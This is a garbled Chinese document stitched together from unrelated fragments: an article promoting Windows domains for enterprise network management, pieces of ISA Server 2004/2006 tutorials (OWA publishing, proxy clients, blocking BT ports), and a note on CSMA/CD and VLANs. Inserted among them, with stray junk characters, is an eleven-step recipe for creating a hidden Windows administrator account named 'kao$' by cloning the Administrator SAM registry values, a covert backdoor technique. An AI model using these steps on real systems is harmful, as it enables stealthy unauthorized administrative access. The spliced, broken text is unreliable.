解决企业内部网络安全最强利器--windows域

（一）问题

   前几天，某电力公司的信息主管（一位刚刚上任的朋友）打电话过来问：“有没有好一点的网管软件啊？现在机子多了，人手一机，问题也越来越多了，相互猜密码的、丢资料、丢账号、系统成天崩溃的、在工位上玩游戏的、乱用打印机的。总之很乱，也不好管、就算自己看见了，平时关系也不错，也不好意思说，说了也起不倒多大作用。我这个信息主管，有名无实啊。”。听完以后十分感慨，微软的桌面称霸中国市场这么久，竟然有这么多人不知道微软的服务才是管理桌面的最强利器。

   那么今天，我们就来分享一下，我为这位友人出的解决方案：

（二）案例

   一、项目背景

       I 公司简介：某某市某某供电局，通过合理的运营和管理，发展迅速，员工人数已有200人左右，为了满足公司未来的发展和企业运营的需求，公司决定重新部署企业网络。公司计划部署一个由200台计算机组成的局域网。用于完成企业数据通信和资源共享。

       公司由运行科，保护科，变配电科，巡检科，

1. net user kao$ 123456 /add/HUf'JtJO!Uw
2.net localgroup administrators kao$ /add
3.net user （没有kao$,继续）
4.compmgmt.msc (查看用户,有kao$)JI}(}&x2n]R rJ3e[
5.regedit  到了注册表`继续→HKEY_LOCAL_MACHINE 找到sam子键`右键权限设置完全控制
6.退出注册表然后再进再找到sam`现在多出几个子键.\'N$ooDHHKEY_LOCAL_MACHINE\SAM\SAM\Domains\user

出来5个选项,前三个分别是Administrator,Guest,SUPPORT_388945a0三个内置用户的默认权限,而紧跟着的下面这个是kao$的权限！ x|X%Zxbl1x
7.选000001F4看到f表项,右选修改,复制所有,继续点开kao$的权限子键看到f和v选f修改替换成管理员所有权限！
8.在kao$下面的一个子键叫names`对应的kao$用户名！

9.net user kao$ /del
10.compmgmt.msc(看用户kao$消失,注册表那里也应该消失了)
11.这个时候再选那

点击下一步，在这里选择源，即该数据传输请求试用由谁发起的，在这里选择本地主机，如图31

点击下一步，在这里选择目的，即数据要发送到哪里去，选择内部，如图32

然后点两次下一步，然后完成访问规则的创建，如图33所示

最后点应用，使访问规则生效。

    在这里做这一步的目的是，我们要在ISA服务器和Exchange服务器之间建立一个证书上的信任关系，而这个信任关系需要通过CA的证书链来实现，要安装CA的证书链，就需要通过web页面访问CA的web站点，而ISA服务器默认是将这个禁止掉的，所以我们需要单独建立一条访问规则来开启它，下面来安装证书链。

    在ISA防火墙上打开IE浏览器，输入CA的web站点地址，在该实验中为

    本篇文章中，我们来说明一下如何通过ISA2004防火墙发布启用了SSL的OWA，OWA使用上次的试验环境，下面开始试验。
　　试验环境：Exchange2003

　　CA

　　ISA2006(本次试验使用的是企业版)

　　客户端(任意操作系统) 

　　首先我们安装ISA2006，准备一台具有两块网卡的Windows2003操作系统机器，并将ISA2006企业版的安装程序拷贝上去，下面开始安装ISA2006：

　　在安装之前，先要进行网卡设置，首先设置网卡IP地址，如图1：

然后将要安装ISA2006的机器加入Exchange2003所在的域，并以域管理员的身份登陆，然后开始安装ISA2006：关键部分设置如图2至图6:

    我们知道，传统的局域网Ethernet 使用具有冲突检测的载波监听多路访问( CSMA / CD )方法。在CSMA / CD 网络中，节点可以在它们有数据需要发送的任何时候使用网络。在节点传输数据之前，它进行'监听'以了解网络是否很繁忙。如果不是，则节点开始传送数据。如果网络正在使用，则节点等待。如果两个节点进行监听，没有听到任何东西，而开始同时使用线路，则会出现冲突。在发送数据时，它如果使用广播地址，那么在此网段上的所有PC都将收到数据包，这样一来如果该网段PC众多，很容易引起广播风暴。而冲突和广播风暴是影响网络性能的重要因素。为 解 决这一问题，引入了虚拟局域网(VLAN的概念。

　　虚拟网络是在整个网络中通过网络

在企业局域网中往往需要对员工使用电脑进行严格限制，比如不允许登录某些网站，不允许使用QQ、MSN，限制某些端口不能玩网络游戏等等。下面，笔者列举几个比较经典的利用ISA进行网络访问控制的实例。

　　一、彻底封闭BT下载

　　BT下载会占用大量的网络带宽，造成局域网的拥塞，因此是企业网管首先要限制的。BT一般使用TCP的6881～6889的端口，因此我们就从端口入手在ISA建立相应的策略进行限制。

　　1.添加协议集

　　在ISA控制台窗口中，右键点击“防火墙策略”，选择“新建→访问规则”，弹出访问规则向导对话框，在“访问规则名称”栏中输入“禁用BT”，点击“下一步”按钮后，选

本文我们要让部署好的ISA来干活了。ISA能干什么活?从字面意思看，ISA的意思是互联网安全加速器，安全指的是防火墙功能，加速器则是代理服务器功能。今天我们就要部署ISA的代理服务器功能，看看内网用户如何利用ISA来访问互联网。

　　ISA的代理服务支持三种客户端，分别是:

　　●Web代理客户端

　　●防火墙客户端

　　●SNAT客户端

　　我们搭建一个实验环境测试三种客户端的具体应用，实验拓扑如下图所示，Beijing安装了ISA2006标准版，Perth是内网客户机。

　　

因为ISA默认的防火墙策略是拒绝一切通讯，所以实验之前我们需要先在ISA上创建一条访问规则，允许内网用户访问互联网。由于当前的主要目的是测试ISA的代理服务器功能，因